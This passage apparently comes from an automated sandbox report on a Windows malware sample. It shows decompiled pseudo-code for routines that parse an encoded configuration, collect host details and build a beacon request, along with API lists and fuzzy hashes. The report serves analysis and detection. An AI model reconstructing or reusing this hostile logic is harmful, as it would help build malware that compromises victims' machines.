                                                          								}
                                                          							}
                                                          							_t38 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          							_t17 = _t38 + 0x2b9edf8; // 0x69b93a0
                                                          							_t18 = _t38 + 0x2b9edd0; // 0x680043
                                                          							_t45 = E02B95D7D(_v8, 0x80000001, _t52, _t18, _t17);
                                                          							HeapFree( *0x2b9d238, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x2b9d238, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E02B94F14(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}


















                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,069B9368,00000000,?,74B5F710,00000000,74B5F730), ref: 02B98D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,069B93A0,?,00000000,30314549,00000014,004F0053,069B935C), ref: 02B98E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02B9523E), ref: 02B98E12
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c323d1b6eaf5a047446a22e8e5bbdeddc29d3407c14dc8ddaa00b21a63c3a388
                                                          • Instruction ID: 23ba426de17843b2ff1a8d504febcf55b0a269c7b2fae4053116dd6b6a8c657e
                                                          • Opcode Fuzzy Hash: c323d1b6eaf5a047446a22e8e5bbdeddc29d3407c14dc8ddaa00b21a63c3a388
                                                          • Instruction Fuzzy Hash: BD31C072940109BFDF21EB99DD84E9ABBBEEF49744F1604A6F5019B060D3709A54CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E02B9A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				void* _v8;
                                                          				void* __edi;
                                                          				intOrPtr _t18;
                                                          				void* _t24;
                                                          				void* _t30;
                                                          				void* _t36;
                                                          				void* _t40;
                                                          				intOrPtr _t42;
                                                          
                                                          				_t36 = __edx;
                                                          				_t32 = __ecx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t42 =  *0x2b9d340; // 0x69b9a88
                                                          				_push(0x800);
                                                          				_push(0);
                                                          				_push( *0x2b9d238);
                                                          				if( *0x2b9d24c >= 5) {
                                                          					if(RtlAllocateHeap() == 0) {
                                                          						L6:
                                                          						_t30 = 8;
                                                          						L7:
                                                          						if(_t30 != 0) {
                                                          							L10:
                                                          							 *0x2b9d24c =  *0x2b9d24c + 1;
                                                          							L11:
                                                          							return _t30;
                                                          						}
                                                          						_t44 = _a4;
                                                          						_t40 = _v8;
                                                          						 *_a16 = _a4;
                                                          						 *_a20 = E02B97306(_t44, _t40);
                                                          						_t18 = E02B94A09(_t40, _t44);
                                                          						if(_t18 != 0) {
                                                          							 *_a8 = _t40;
                                                          							 *_a12 = _t18;
                                                          							if( *0x2b9d24c < 5) {
                                                          								 *0x2b9d24c =  *0x2b9d24c & 0x00000000;
                                                          							}
                                                          							goto L11;
                                                          						}
                                                          						_t30 = 0xbf;
                                                          						E02B96761();
                                                          						RtlFreeHeap( *0x2b9d238, 0, _t40); // executed
                                                          						goto L10;
                                                          					}
                                                          					_t24 = E02B91F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                          					L5:
                                                          					_t30 = _t24;
                                                          					goto L7;
                                                          				}
                                                          				if(RtlAllocateHeap() == 0) {
                                                          					goto L6;
                                                          				}
                                                          				_t24 = E02B94AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
                                                          				goto L5;
                                                          			}












                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 02B9A39A
                                                            • Part of subcall function 02B94AB6: GetTickCount.KERNEL32 ref: 02B94ACA
                                                            • Part of subcall function 02B94AB6: wsprintfA.USER32 ref: 02B94B1A
                                                            • Part of subcall function 02B94AB6: wsprintfA.USER32 ref: 02B94B37
                                                            • Part of subcall function 02B94AB6: wsprintfA.USER32 ref: 02B94B63
                                                            • Part of subcall function 02B94AB6: HeapFree.KERNEL32(00000000,?), ref: 02B94B75
                                                            • Part of subcall function 02B94AB6: wsprintfA.USER32 ref: 02B94B96
                                                            • Part of subcall function 02B94AB6: HeapFree.KERNEL32(00000000,?), ref: 02B94BA6
                                                            • Part of subcall function 02B94AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B94BD4
                                                            • Part of subcall function 02B94AB6: GetTickCount.KERNEL32 ref: 02B94BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 02B9A3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,02B95289,?,02B95289,00000002,?,?,02B95D5E,?), ref: 02B9A415
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: d6712e859ce585531961d2d871927d617c90a9f05b1da22fd3b1b048dfc410cf
                                                          • Instruction ID: 534e8314b88a5c3c503ce416048d0d00d15a649bc7ba5e422559fb2810012071
                                                          • Opcode Fuzzy Hash: d6712e859ce585531961d2d871927d617c90a9f05b1da22fd3b1b048dfc410cf
                                                          • Instruction Fuzzy Hash: B8214971640205EBCF11EF99D984FAA7BACEB49384F1084B6FD019B240EB70E955DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E02B958DB(void* __ecx) {
                                                          				signed int _v8;
                                                          				void* _t15;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				intOrPtr* _t23;
                                                          
                                                          				_t23 = __imp__;
                                                          				_t20 = 0;
                                                          				_v8 = _v8 & 0;
                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                          				_t10 = _v8;
                                                          				if(_v8 != 0) {
                                                          					_t20 = E02B9A71F(_t10 + 1);
                                                          					if(_t20 != 0) {
                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                          						if(_t15 != 0) {
                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                          						} else {
                                                          							E02B9A734(_t20);
                                                          							_t20 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t20;
                                                          			}










                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,02B91FA0,74B5F710,00000000,?,?,02B91FA0), ref: 02B958F3
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,02B91FA0,02B91FA1,?,?,02B91FA0), ref: 02B95910
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 2fb24f7fe01bfcb03846c1d09c7c765f2022a4b8279636a6d05f0c6fa887e67c
                                                          • Instruction ID: cea467fc9429baff348b1648d36890ef1fc0ab560a3ca40510f8fc052bdc45e7
                                                          • Opcode Fuzzy Hash: 2fb24f7fe01bfcb03846c1d09c7c765f2022a4b8279636a6d05f0c6fa887e67c
                                                          • Instruction Fuzzy Hash: 9CF05436640109BFEF22D7999D01FAF76FDDBC5654F6500BAE604E3140EA74DA018B70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          
                                                          				_t14 = 1;
                                                          				_t4 = _a8;
                                                          				if(_t4 == 0) {
                                                          					if(InterlockedDecrement(0x2b9d23c) == 0) {
                                                          						E02B91B42();
                                                          					}
                                                          				} else {
                                                          					if(_t4 == 1 && InterlockedIncrement(0x2b9d23c) == 1) {
                                                          						_t10 = E02B912E5(_t11, _t12, _a4); // executed
                                                          						if(_t10 != 0) {
                                                          							_t14 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t14;
                                                          			}









                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(02B9D23C), ref: 02B94EDF
                                                            • Part of subcall function 02B912E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02B94EF2,?), ref: 02B912F8
                                                          • InterlockedDecrement.KERNEL32(02B9D23C), ref: 02B94EFF
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 8015945edeeb28f6c59788249e16e05271b8ab95cbab54eb19445dbc97396c79
                                                          • Instruction ID: 5a6693cbd1fed06141d8dfd2147de335347071f0f8315659cf348293d94b4b06
                                                          • Opcode Fuzzy Hash: 8015945edeeb28f6c59788249e16e05271b8ab95cbab54eb19445dbc97396c79
                                                          • Instruction Fuzzy Hash: 96E0863125813753AF216BB8DA08B5EFB63EF82B84F0185F5F4CAD1050D710C452D695
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E02B91AE2(intOrPtr* __edi) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _t15;
                                                          				intOrPtr* _t21;
                                                          
                                                          				_t21 = __edi;
                                                          				_push( &_v12);
                                                          				_push(__edi);
                                                          				_v8 = 0x1d4c0;
                                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                          				while(1) {
                                                          					_v16 = _t15;
                                                          					Sleep(0x1f4); // executed
                                                          					if(_v12 == 4) {
                                                          						break;
                                                          					}
                                                          					if(_v8 == 0) {
                                                          						L4:
                                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                          						continue;
                                                          					} else {
                                                          						if(_v8 <= 0x1f4) {
                                                          							_v16 = 0x80004004;
                                                          						} else {
                                                          							_v8 = _v8 - 0x1f4;
                                                          							goto L4;
                                                          						}
                                                          					}
                                                          					L8:
                                                          					return _v16;
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 02B91B2A
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: a0acba7d7a3acd3e13e4abd246c4f2aabc530e777e1991cc1688c08604cd98a1
                                                          • Instruction ID: 46c19d4c3645b1dbce672b7547929135a1e6363c7c1b51cc53384ca99ebffdca
                                                          • Opcode Fuzzy Hash: a0acba7d7a3acd3e13e4abd246c4f2aabc530e777e1991cc1688c08604cd98a1
                                                          • Instruction Fuzzy Hash: 2BF01475D12219EBCF00DB98C588AEDB7B8EF08304F1084AAE506A3200E3B46B85DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 95%
                                                          			E02B9888E(int* __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t26;
                                                          				signed int _t31;
                                                          				signed int _t37;
                                                          				char* _t43;
                                                          				char* _t44;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t51;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t55;
                                                          				signed int _t58;
                                                          				intOrPtr _t61;
                                                          				signed int _t62;
                                                          				signed int _t67;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t92;
                                                          				void* _t97;
                                                          				intOrPtr _t114;
                                                          
                                                          				_t98 = __ecx;
                                                          				_t26 =  *0x2b9d2a4; // 0x63699bc3
                                                          				if(E02B97145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
                                                          					 *0x2b9d2d8 = _v8;
                                                          				}
                                                          				_t31 =  *0x2b9d2a4; // 0x63699bc3
                                                          				if(E02B97145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                                          					_v12 = 2;
                                                          					L62:
                                                          					return _v12;
                                                          				}
                                                          				_t37 =  *0x2b9d2a4; // 0x63699bc3
                                                          				if(E02B97145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                                          					L60:
                                                          					HeapFree( *0x2b9d238, 0, _v16);
                                                          					goto L62;
                                                          				} else {
                                                          					_t97 = _v12;
                                                          					if(_t97 == 0) {
                                                          						_t43 = 0;
                                                          					} else {
                                                          						_t92 =  *0x2b9d2a4; // 0x63699bc3
                                                          						_t43 = E02B96B2E(_t98, _t97, _t92 ^ 0x724e87bc);
                                                          					}
                                                          					if(_t43 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                                          							 *0x2b9d240 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t44 = 0;
                                                          					} else {
                                                          						_t88 =  *0x2b9d2a4; // 0x63699bc3
                                                          						_t44 = E02B96B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
                                                          					}
                                                          					if(_t44 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                                          							 *0x2b9d244 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t84 =  *0x2b9d2a4; // 0x63699bc3
                                                          						_t45 = E02B96B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x2b9d248 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t80 =  *0x2b9d2a4; // 0x63699bc3
                                                          						_t46 = E02B96B2E(_t98, _t97, _t80 ^ 0x0602e249);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x2b9d004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t76 =  *0x2b9d2a4; // 0x63699bc3
                                                          						_t47 = E02B96B2E(_t98, _t97, _t76 ^ 0x3603764c);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x2b9d02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t72 =  *0x2b9d2a4; // 0x63699bc3
                                                          						_t48 = E02B96B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_push(_t48);
                                                          						_t69 = 0x10;
                                                          						_t70 = E02B956FA(_t69);
                                                          						if(_t70 != 0) {
                                                          							_push(_t70);
                                                          							E02B96702();
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t67 =  *0x2b9d2a4; // 0x63699bc3
                                                          						_t49 = E02B96B2E(_t98, _t97, _t67 ^ 0xb30fc035);
                                                          					}
                                                          					if(_t49 != 0 && E02B956FA(0, _t49) != 0) {
                                                          						_t114 =  *0x2b9d32c; // 0x69b95b0
                                                          						E02B923F4(_t114 + 4, _t65);
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t62 =  *0x2b9d2a4; // 0x63699bc3
                                                          						_t50 = E02B96B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L52:
                                                          						_t51 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          						_t20 = _t51 + 0x2b9e252; // 0x616d692f
                                                          						 *0x2b9d2d4 = _t20;
                                                          						goto L53;
                                                          					} else {
                                                          						_t61 = E02B956FA(0, _t50);
                                                          						 *0x2b9d2d4 = _t61;
                                                          						if(_t61 != 0) {
                                                          							L53:
                                                          							if(_t97 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t58 =  *0x2b9d2a4; // 0x63699bc3
                                                          								_t53 = E02B96B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								_t54 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          								_t21 = _t54 + 0x2b9e791; // 0x6976612e
                                                          								_t55 = _t21;
                                                          							} else {
                                                          								_t55 = E02B956FA(0, _t53);
                                                          							}
                                                          							 *0x2b9d340 = _t55;
                                                          							HeapFree( *0x2b9d238, 0, _t97);
                                                          							_v12 = 0;
                                                          							goto L60;
                                                          						}
                                                          						goto L52;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B98933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B98965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B98997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B989C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B989FB
                                                          • HeapFree.KERNEL32(00000000,02B95D25,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008,?,02B95D25), ref: 02B98AF2
                                                          • HeapFree.KERNEL32(00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008,?,02B95D25), ref: 02B98B05
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: f6e9d256ee8e38e22d48e880a17215f25bd94dc72010fd77d296797a002c27f4
                                                          • Instruction ID: 6e0291b96635772c1088958245f8445be43302c483f21cd3e14299a43c859a9c
                                                          • Opcode Fuzzy Hash: f6e9d256ee8e38e22d48e880a17215f25bd94dc72010fd77d296797a002c27f4
                                                          • Instruction Fuzzy Hash: 6F717C71E40106AFCF10EBBADE88D5BB7EEEB493847690DB5E502D7144E731D9528B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E02B91F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v44;
                                                          				intOrPtr _v52;
                                                          				void* __edi;
                                                          				long _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t33;
                                                          				intOrPtr _t34;
                                                          				int _t37;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t71;
                                                          				intOrPtr _t74;
                                                          				int _t77;
                                                          				intOrPtr _t78;
                                                          				int _t81;
                                                          				intOrPtr _t83;
                                                          				int _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				intOrPtr _t98;
                                                          				void* _t100;
                                                          				int _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          
                                                          				_t95 = __edx;
                                                          				_t91 = __ecx;
                                                          				_t25 = __eax;
                                                          				_t105 = _a16;
                                                          				_v4 = 8;
                                                          				if(__eax == 0) {
                                                          					_t25 = GetTickCount();
                                                          				}
                                                          				_t26 =  *0x2b9d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t27 =  *0x2b9d014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t28 =  *0x2b9d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t29 = E02B9D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t30 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          				_t3 = _t30 + 0x2b9e633; // 0x74666f73
                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x2b9d02c,  *0x2b9d004, _t25);
                                                          				_t33 = E02B956CD();
                                                          				_t34 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          				_t4 = _t34 + 0x2b9e673; // 0x74707526
                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                          				_t108 = _t106 + 0x38;
                                                          				_t102 = _t101 + _t37;
                                                          				_t96 = E02B958DB(_t91);
                                                          				if(_t96 != 0) {
                                                          					_t83 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t6 = _t83 + 0x2b9e8d4; // 0x736e6426
                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t86;
                                                          					HeapFree( *0x2b9d238, 0, _t96);
                                                          				}
                                                          				_t97 = E02B9A199();
                                                          				if(_t97 != 0) {
                                                          					_t78 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t8 = _t78 + 0x2b9e8dc; // 0x6f687726
                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t81;
                                                          					HeapFree( *0x2b9d238, 0, _t97);
                                                          				}
                                                          				_t98 =  *0x2b9d32c; // 0x69b95b0
                                                          				_a32 = E02B94622(0x2b9d00a, _t98 + 4);
                                                          				_t42 =  *0x2b9d2d0; // 0x0
                                                          				if(_t42 != 0) {
                                                          					_t74 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t11 = _t74 + 0x2b9e8b6; // 0x3d736f26
                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t77;
                                                          				}
                                                          				_t43 =  *0x2b9d2cc; // 0x0
                                                          				if(_t43 != 0) {
                                                          					_t71 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t13 = _t71 + 0x2b9e88d; // 0x3d706926
                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                          				}
                                                          				if(_a32 != 0) {
                                                          					_t100 = RtlAllocateHeap( *0x2b9d238, 0, 0x800);
                                                          					if(_t100 != 0) {
                                                          						E02B9518F(GetTickCount());
                                                          						_t50 =  *0x2b9d32c; // 0x69b95b0
                                                          						__imp__(_t50 + 0x40);
                                                          						asm("lock xadd [eax], ecx");
                                                          						_t54 =  *0x2b9d32c; // 0x69b95b0
                                                          						__imp__(_t54 + 0x40);
                                                          						_t56 =  *0x2b9d32c; // 0x69b95b0
                                                          						_t103 = E02B91BB6(1, _t95, _t105,  *_t56);
                                                          						asm("lock xadd [eax], ecx");
                                                          						if(_t103 != 0) {
                                                          							StrTrimA(_t103, 0x2b9c28c);
                                                          							_push(_t103);
                                                          							_t62 = E02B9361A();
                                                          							_v16 = _t62;
                                                          							if(_t62 != 0) {
                                                          								_t89 = __imp__;
                                                          								 *_t89(_t103, _v0);
                                                          								 *_t89(_t100, _a4);
                                                          								_t90 = __imp__;
                                                          								 *_t90(_t100, _v28);
                                                          								 *_t90(_t100, _t103);
                                                          								_t68 = E02B96777(0xffffffffffffffff, _t100, _v28, _v24);
                                                          								_v52 = _t68;
                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                          									E02B96761();
                                                          								}
                                                          								HeapFree( *0x2b9d238, 0, _v44);
                                                          							}
                                                          							HeapFree( *0x2b9d238, 0, _t103);
                                                          						}
                                                          						HeapFree( *0x2b9d238, 0, _t100);
                                                          					}
                                                          					HeapFree( *0x2b9d238, 0, _a24);
                                                          				}
                                                          				HeapFree( *0x2b9d238, 0, _t105);
                                                          				return _a12;
                                                          			}

















































                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 02B91F2A
                                                          • wsprintfA.USER32 ref: 02B91F77
                                                          • wsprintfA.USER32 ref: 02B91F94
                                                          • wsprintfA.USER32 ref: 02B91FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B91FC7
                                                          • wsprintfA.USER32 ref: 02B91FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B91FF9
                                                          • wsprintfA.USER32 ref: 02B92030
                                                          • wsprintfA.USER32 ref: 02B92050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B9206D
                                                          • GetTickCount.KERNEL32 ref: 02B9207D
                                                          • RtlEnterCriticalSection.NTDLL(069B9570), ref: 02B92091
                                                          • RtlLeaveCriticalSection.NTDLL(069B9570), ref: 02B920AF
                                                            • Part of subcall function 02B91BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02B920C2,?,069B95B0), ref: 02B91BE1
                                                            • Part of subcall function 02B91BB6: lstrlen.KERNEL32(?,?,?,02B920C2,?,069B95B0), ref: 02B91BE9
                                                            • Part of subcall function 02B91BB6: strcpy.NTDLL ref: 02B91C00
                                                            • Part of subcall function 02B91BB6: lstrcat.KERNEL32(00000000,?), ref: 02B91C0B
